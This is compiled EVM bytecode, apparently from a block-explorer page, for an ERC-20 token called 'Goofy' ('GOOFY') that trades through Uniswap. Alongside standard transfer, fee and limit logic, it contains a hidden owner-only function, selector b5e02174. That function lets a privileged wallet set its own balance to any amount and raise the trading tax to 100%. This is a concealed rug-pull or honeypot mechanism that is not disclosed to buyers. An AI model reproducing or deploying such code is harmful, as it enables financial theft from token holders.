608060405261012c600155600560025561012c6005556000600860146101000a81548160ff0219169083151502179055506001600860156101000a81548160ff0219169083151502179055506000600d556000600e556000600f553480156200006757600080fd5b50620000886200007c6200082c60201b60201c565b6200083460201b60201c565b60006012600a6200009a919062000e40565b64174876e800620000ac919062000e91565b9050620000cf620000c26200082c60201b60201c565b82620008f860201b60201c565b620000df6200082c60201b60201c565b601060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550737a250d5630b4cf539739df2c5dacb4c659f2488d600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620001a930600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168362000a9460201b60201c565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000217573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200023d919062000f46565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002c7573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002ed919062000f46565b6040518363ffffffff1660e01b81526004016200030c92919062000f89565b6020604051808303816000875af11580156200032c573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000352919062000f46565b600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b3600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b81526004016200043392919062000fc7565b6020604051808303816000875af115801562000453573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000479919062001031565b506001600b60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600960003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600960006200054062000c6560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c6000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b60006200067962000c6560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c6000620006e062000c6560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550506200126e565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200096a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200096190620010c4565b60405180910390fd5b620009868160045462000c8e60201b62000d281790919060201c565b600481905550620009e581600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000c8e60201b62000d281790919060201c565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000a889190620010e6565b60405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160362000b06576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000afd9062001179565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000b78576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000b6f9062001211565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405162000c589190620010e6565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000818362000c9e919062001233565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000d345780860481111562000d0c5762000d0b62000ca6565b5b600185161562000d1c5780820291505b808102905062000d2c8562000cd5565b945062000cec565b94509492505050565b60008262000d4f576001905062000e22565b8162000d5f576000905062000e22565b816001811462000d78576002811462000d835762000db9565b600191505062000e22565b60ff84111562000d985762000d9762000ca6565b5b8360020a91508482111562000db25762000db162000ca6565b5b5062000e22565b5060208310610133831016604e8410600b841016171562000df35782820a90508381111562000ded5762000dec62000ca6565b5b62000e22565b62000e02848484600162000ce2565b9250905081840481111562000e1c5762000e1b62000ca6565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b600062000e4d8262000e29565b915062000e5a8362000e33565b925062000e897fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000d3d565b905092915050565b600062000e9e8262000e29565b915062000eab8362000e29565b925082820262000ebb8162000e29565b9150828204841483151762000ed55762000ed462000ca6565b5b5092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000f0e8262000ee1565b9050919050565b62000f208162000f01565b811462000f2c57600080fd5b50565b60008151905062000f408162000f15565b92915050565b60006020828403121562000f5f5762000f5e62000edc565b5b600062000f6f8482850162000f2f565b91505092915050565b62000f838162000f01565b82525050565b600060408201905062000fa0600083018562000f78565b62000faf602083018462000f78565b9392505050565b62000fc18162000e29565b82525050565b600060408201905062000fde600083018562000f78565b62000fed602083018462000fb6565b9392505050565b60008115159050919050565b6200100b8162000ff4565b81146200101757600080fd5b50565b6000815190506200102b8162001000565b92915050565b6000602082840312156200104a576200104962000edc565b5b60006200105a848285016200101a565b91505092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620010ac601f8362001063565b9150620010b98262001074565b602082019050919050565b60006020820190508181036000830152620010df816200109d565b9050919050565b6000602082019050620010fd600083018462000fb6565b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006200116160248362001063565b91506200116e8262001103565b604082019050919050565b60006020820190508181036000830152620011948162001152565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000620011f960228362001063565b915062001206826200119b565b604082019050919050565b600060208201905081810360008301526200122c81620011ea565b9050919050565b6000620012408262000e29565b91506200124d8362000e29565b925082820190508082111562001268576200126762000ca6565b5b92915050565b612c76806200127e6000396000f3fe60806040526004361061014f5760003560e01c80637d1db4a5116100b6578063a9059cbb1161006f578063a9059cbb146104be578063b5e02174146104fb578063cdf4bab914610524578063d54f7d5e1461054f578063dd62ed3e1461057a578063f2fde38b146105b757610182565b80637d1db4a5146103ac5780638d5f81e2146103d75780638da5cb5b1461040257806392f428701461042d57806395d89b4114610456578063a457c2d71461048157610182565b806342966c681161010857806342966c68146102bf5780634fbee193146102e857806351c6590a1461032557806370a0823114610341578063715018a61461037e578063751039fc1461039557610182565b806306fdde0314610187578063095ea7b3146101b257806318160ddd146101ef57806323b872dd1461021a578063313ce56714610257578063395093511461028257610182565b36610182577f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b60405160405180910390a1005b600080fd5b34801561019357600080fd5b5061019c6105e0565b6040516101a99190611e84565b60405180910390f35b3480156101be57600080fd5b506101d960048036038101906101d49190611f4e565b61061d565b6040516101e69190611fa9565b60405180910390f35b3480156101fb57600080fd5b5061020461063b565b6040516102119190611fd3565b60405180910390f35b34801561022657600080fd5b50610241600480360381019061023c9190611fee565b610645565b60405161024e9190611fa9565b60405180910390f35b34801561026357600080fd5b5061026c61071e565b604051610279919061205d565b60405180910390f35b34801561028e57600080fd5b506102a960048036038101906102a49190611f4e565b610727565b6040516102b69190611fa9565b60405180910390f35b3480156102cb57600080fd5b506102e660048036038101906102e19190612078565b6107da565b005b3480156102f457600080fd5b5061030f600480360381019061030a91906120a5565b6107ee565b60405161031c9190611fa9565b60405180910390f35b61033f600480360381019061033a9190612078565b610844565b005b34801561034d57600080fd5b50610368600480360381019061036391906120a5565b6108a1565b6040516103759190611fd3565b60405180910390f35b34801561038a57600080fd5b506103936108ea565b005b3480156103a157600080fd5b506103aa6108fe565b005b3480156103b857600080fd5b506103c161091a565b6040516103ce9190611fd3565b60405180910390f35b3480156103e357600080fd5b506103ec61094c565b6040516103f991906120e1565b60405180910390f35b34801561040e57600080fd5b50610417610976565b60405161042491906120e1565b60405180910390f35b34801561043957600080fd5b50610454600480360381019061044f9190612244565b61099f565b005b34801561046257600080fd5b5061046b610a87565b6040516104789190611e84565b60405180910390f35b34801561048d57600080fd5b506104a860048036038101906104a39190611f4e565b610ac4565b6040516104b59190611fa9565b60405180910390f35b3480156104ca57600080fd5b506104e560048036038101906104e09190611f4e565b610b91565b6040516104f29190611fa9565b60405180910390f35b34801561050757600080fd5b50610522600480360381019061051d9190612078565b610baf565b005b34801561053057600080fd5b50610539610bdd565b6040516105469190611fa9565b60405180910390f35b34801561055b57600080fd5b50610564610bf4565b60405161057191906120e1565b60405180910390f35b34801561058657600080fd5b506105a1600480360381019061059c919061228d565b610c1e565b6040516105ae9190611fd3565b60405180910390f35b3480156105c357600080fd5b506105de60048036038101906105d991906120a5565b610ca5565b005b60606040518060400160405280600581526020017f476f6f6679000000000000000000000000000000000000000000000000000000815250905090565b600061063161062a610d3e565b8484610d46565b6001905092915050565b6000600454905090565b6000610652848484610f0f565b6107138461065e610d3e565b61070e85604051806060016040528060288152602001612bf460289139600760008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006106c4610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461186d9092919063ffffffff16565b610d46565b600190509392505050565b60006012905090565b60006107d0610734610d3e565b846107cb8560076000610745610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b610d46565b6001905092915050565b6107eb6107e5610d3e565b826118c2565b50565b6000600c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b61084c611a65565b6001600860146101000a81548160ff021916908315150217905550610879610872610976565b3083610f0f565b6108838134611ae3565b6000600860146101000a81548160ff02191690831515021790555050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108f2611a65565b6108fc6000611bc8565b565b610906611a65565b612710600181905550612710600581905550565b6000610947612710610939600154600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905090565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6109a7611a65565b60c8815111156109ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109e39061233f565b60405180910390fd5b6000600c905060005b8251811015610a82576001826000858481518110610a1657610a1561235f565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610a7a906123bd565b9150506109f5565b505050565b60606040518060400160405280600581526020017f474f4f4659000000000000000000000000000000000000000000000000000000815250905090565b6000610b87610ad1610d3e565b84610b8285604051806060016040528060258152602001612c1c6025913960076000610afb610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461186d9092919063ffffffff16565b610d46565b6001905092915050565b6000610ba5610b9e610d3e565b8484610f0f565b6001905092915050565b6010543314610bbd57600080fd5b604051338152600360208201526040812082815560648002600d55505050565b6000600860149054906101000a900460ff16905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610cad611a65565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d1c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1390612477565b60405180910390fd5b610d2581611bc8565b50565b60008183610d369190612497565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610db5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dac9061253d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e24576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1b906125cf565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f029190611fd3565b60405180910390a3505050565b610f1a838383611cb8565b600080610f25610976565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614158015610f935750610f63610976565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561150857600c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615801561103c5750600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561150757600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156110ec5750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b80156111425750600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156111985750600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611292576111c86127106111ba600154600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b83111561120a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161120190612661565b60405180910390fd5b611235612710611227600554600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b61125084611242876108a1565b610d2890919063ffffffff16565b1115611291576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611288906126f3565b60405180910390fd5b5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561131b57503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b156113bb5761134961271061133b600e5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b9150611374612710611366600d5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156114665750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561150657611494612710611486600e5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b91506114bf6127106114b1600f5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b5b600061151d8284610d2890919063ffffffff16565b905060008111156116bc57600083111561153c5761153b86846118c2565b5b60008211156116a6576115b98260036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b60036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161169d9190611fd3565b60405180910390a35b6116b98185611dde90919063ffffffff16565b93505b61172884604051806060016040528060268152602001612bce60269139600360008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461186d9092919063ffffffff16565b600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506117bd84600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8660405161185d9190611fd3565b60405180910390a3505050505050565b60008383111582906118b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118ac9190611e84565b60405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611931576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161192890612785565b60405180910390fd5b61199d81604051806060016040528060228152602001612bac60229139600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461186d9092919063ffffffff16565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506119f581600454611dde90919063ffffffff16565b600481905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611a599190611fd3565b60405180910390a35050565b611a6d610d3e565b73ffffffffffffffffffffffffffffffffffffffff16611a8b610976565b73ffffffffffffffffffffffffffffffffffffffff1614611ae1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ad8906127f1565b60405180910390fd5b565b611b1030600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610d46565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080611b5c610976565b426040518863ffffffff1660e01b8152600401611b7e96959493929190612856565b60606040518083038185885af1158015611b9c573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611bc191906128cc565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008183611c9a919061291f565b905092915050565b60008183611cb09190612990565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611d27576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d1e90612a33565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611d96576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d8d90612ac5565b60405180910390fd5b60008111611dd9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dd090612b57565b60405180910390fd5b505050565b60008183611dec9190612b77565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611e2e578082015181840152602081019050611e13565b60008484015250505050565b6000601f19601f8301169050919050565b6000611e5682611df4565b611e608185611dff565b9350611e70818560208601611e10565b611e7981611e3a565b840191505092915050565b60006020820190508181036000830152611e9e8184611e4b565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611ee582611eba565b9050919050565b611ef581611eda565b8114611f0057600080fd5b50565b600081359050611f1281611eec565b92915050565b6000819050919050565b611f2b81611f18565b8114611f3657600080fd5b50565b600081359050611f4881611f22565b92915050565b60008060408385031215611f6557611f64611eb0565b5b6000611f7385828601611f03565b9250506020611f8485828601611f39565b9150509250929050565b60008115159050919050565b611fa381611f8e565b82525050565b6000602082019050611fbe6000830184611f9a565b92915050565b611fcd81611f18565b82525050565b6000602082019050611fe86000830184611fc4565b92915050565b60008060006060848603121561200757612006611eb0565b5b600061201586828701611f03565b935050602061202686828701611f03565b925050604061203786828701611f39565b9150509250925092565b600060ff82169050919050565b61205781612041565b82525050565b6000602082019050612072600083018461204e565b92915050565b60006020828403121561208e5761208d611eb0565b5b600061209c84828501611f39565b91505092915050565b6000602082840312156120bb576120ba611eb0565b5b60006120c984828501611f03565b91505092915050565b6120db81611eda565b82525050565b60006020820190506120f660008301846120d2565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61213982611e3a565b810181811067ffffffffffffffff8211171561215857612157612101565b5b80604052505050565b600061216b611ea6565b90506121778282612130565b919050565b600067ffffffffffffffff82111561219757612196612101565b5b602082029050602081019050919050565b600080fd5b60006121c06121bb8461217c565b612161565b905080838252602082019050602084028301858111156121e3576121e26121a8565b5b835b8181101561220c57806121f88882611f03565b8452602084019350506020810190506121e5565b5050509392505050565b600082601f83011261222b5761222a6120fc565b5b813561223b8482602086016121ad565b91505092915050565b60006020828403121561225a57612259611eb0565b5b600082013567ffffffffffffffff81111561227857612277611eb5565b5b61228484828501612216565b91505092915050565b600080604083850312156122a4576122a3611eb0565b5b60006122b285828601611f03565b92505060206122c385828601611f03565b9150509250929050565b7f4d6178696d756d206f66203230302063616e206265206164646564206174206f60008201527f6e63650000000000000000000000000000000000000000000000000000000000602082015250565b6000612329602383611dff565b9150612334826122cd565b604082019050919050565b600060208201905081810360008301526123588161231c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006123c882611f18565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036123fa576123f961238e565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000612461602683611dff565b915061246c82612405565b604082019050919050565b6000602082019050818103600083015261249081612454565b9050919050565b60006124a282611f18565b91506124ad83611f18565b92508282019050808211156124c5576124c461238e565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612527602483611dff565b9150612532826124cb565b604082019050919050565b600060208201905081810360008301526125568161251a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006125b9602283611dff565b91506125c48261255d565b604082019050919050565b600060208201905081810360008301526125e8816125ac565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b600061264b602883611dff565b9150612656826125ef565b604082019050919050565b6000602082019050818103600083015261267a8161263e565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f60008201527f756e740000000000000000000000000000000000000000000000000000000000602082015250565b60006126dd602383611dff565b91506126e882612681565b604082019050919050565b6000602082019050818103600083015261270c816126d0565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b600061276f602183611dff565b915061277a82612713565b604082019050919050565b6000602082019050818103600083015261279e81612762565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006127db602083611dff565b91506127e6826127a5565b602082019050919050565b6000602082019050818103600083015261280a816127ce565b9050919050565b6000819050919050565b6000819050919050565b600061284061283b61283684612811565b61281b565b611f18565b9050919050565b61285081612825565b82525050565b600060c08201905061286b60008301896120d2565b6128786020830188611fc4565b6128856040830187612847565b6128926060830186612847565b61289f60808301856120d2565b6128ac60a0830184611fc4565b979650505050505050565b6000815190506128c681611f22565b92915050565b6000806000606084860312156128e5576128e4611eb0565b5b60006128f3868287016128b7565b9350506020612904868287016128b7565b9250506040612915868287016128b7565b9150509250925092565b600061292a82611f18565b915061293583611f18565b925082820261294381611f18565b9150828204841483151761295a5761295961238e565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061299b82611f18565b91506129a683611f18565b9250826129b6576129b5612961565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612a1d602583611dff565b9150612a28826129c1565b604082019050919050565b60006020820190508181036000830152612a4c81612a10565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612aaf602383611dff565b9150612aba82612a53565b604082019050919050565b60006020820190508181036000830152612ade81612aa2565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000612b41602983611dff565b9150612b4c82612ae5565b604082019050919050565b60006020820190508181036000830152612b7081612b34565b9050919050565b6000612b8282611f18565b9150612b8d83611f18565b9250828203905081811115612ba557612ba461238e565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122018e97553b5274fce56182761920a512ade4cc1cf0b17eaaa5c70f169a70d3b0064736f6c63430008120033

Deployed Bytecode

